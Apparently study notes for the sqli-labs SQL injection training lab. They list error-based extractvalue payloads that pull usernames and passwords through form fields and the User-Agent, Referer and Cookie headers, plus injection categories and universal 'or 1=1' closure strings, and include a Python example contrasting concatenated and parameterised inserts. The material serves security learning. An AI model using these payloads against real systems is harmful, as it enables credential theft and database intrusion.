uname=admin&passwd=a' or extractvalue(1,concat(0x7e,(select*from(select concat_ws(0x7e,id,username,password)from users limit 2,1)a)))--+&submit=Submit
Less-18:
User-Agent:' and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from security.users where username not in ('Dumb','Angelina')),0x7e)) and '
Less-19:
Referer:' and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from security.users where username not in ('Dumb','Angelina')),0x7e)) and '
Less-20:
Cookie: uname=1' or extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e))-- #
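Less-18 to Less-20 above put the string in a request header (User-Agent, Referer, Cookie) instead of a form field. The Python/sqlite3 code below is an added example, not part of the original notes or of the lab's own code; the table layout, function names and probe value are assumptions. It shows a header value in the same quote-breaking shape altering a concatenated INSERT, and being stored verbatim when bound as a parameter.

```python
import sqlite3

# Constructed header value in the same quote-breaking shape as the Less-18
# line above (' and <expression> and '), carrying a harmless sub-select.
PROBE_UA = "' and (select count(*) from users) and '"

def make_db():
    # In-memory stand-in for a header-logging schema; names are assumed.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("CREATE TABLE uagents (uagent TEXT, ip_address TEXT, username TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'demo', 'demo-password')")
    return db

def log_unsafe(db, uagent, ip, user):
    # Vulnerable pattern: header text is concatenated into the statement.
    db.execute("INSERT INTO uagents (uagent, ip_address, username) "
               "VALUES ('" + uagent + "', '" + ip + "', '" + user + "')")

def log_safe(db, uagent, ip, user):
    # Hardened pattern: placeholders keep the header as bound data.
    db.execute("INSERT INTO uagents (uagent, ip_address, username) "
               "VALUES (?, ?, ?)", (uagent, ip, user))

def header_parsed_as_sql(log_fn, uagent):
    """True if the header changed the statement instead of being stored verbatim."""
    db = make_db()
    try:
        log_fn(db, uagent, "192.0.2.10", "demo")
    except sqlite3.Error:
        return True  # the header broke the syntax or referenced SQL objects
    stored = db.execute("SELECT uagent FROM uagents").fetchone()[0]
    return stored != uagent

if __name__ == "__main__":
    for fn in (log_unsafe, log_safe):
        print(fn.__name__, "header parsed as SQL:",
              header_parsed_as_sql(fn, PROBE_UA))
```

The same binding applies to any statement that uses Referer or Cookie values.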
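SQL injection categories:
Injection with visible output:
Injection that allows UNION queries
Error-based injection
Making DNS requests through the injection in order to get the output back
Injection without visible output:
Boolean blind injection
Time-based blind injection
Second-order injection
Universal statements:
1 or 1=1 -- #
1' or 1=1 -- #
1" or 1=1 -- #
1) or 1=1 -- #
1') or 1=1 -- #
1") or 1=1 -- #
1)) or 1=1 -- #
1') or 1=1-- #
1") or 1=1-- #
Determining the closure:
uname=1&passwd=1 or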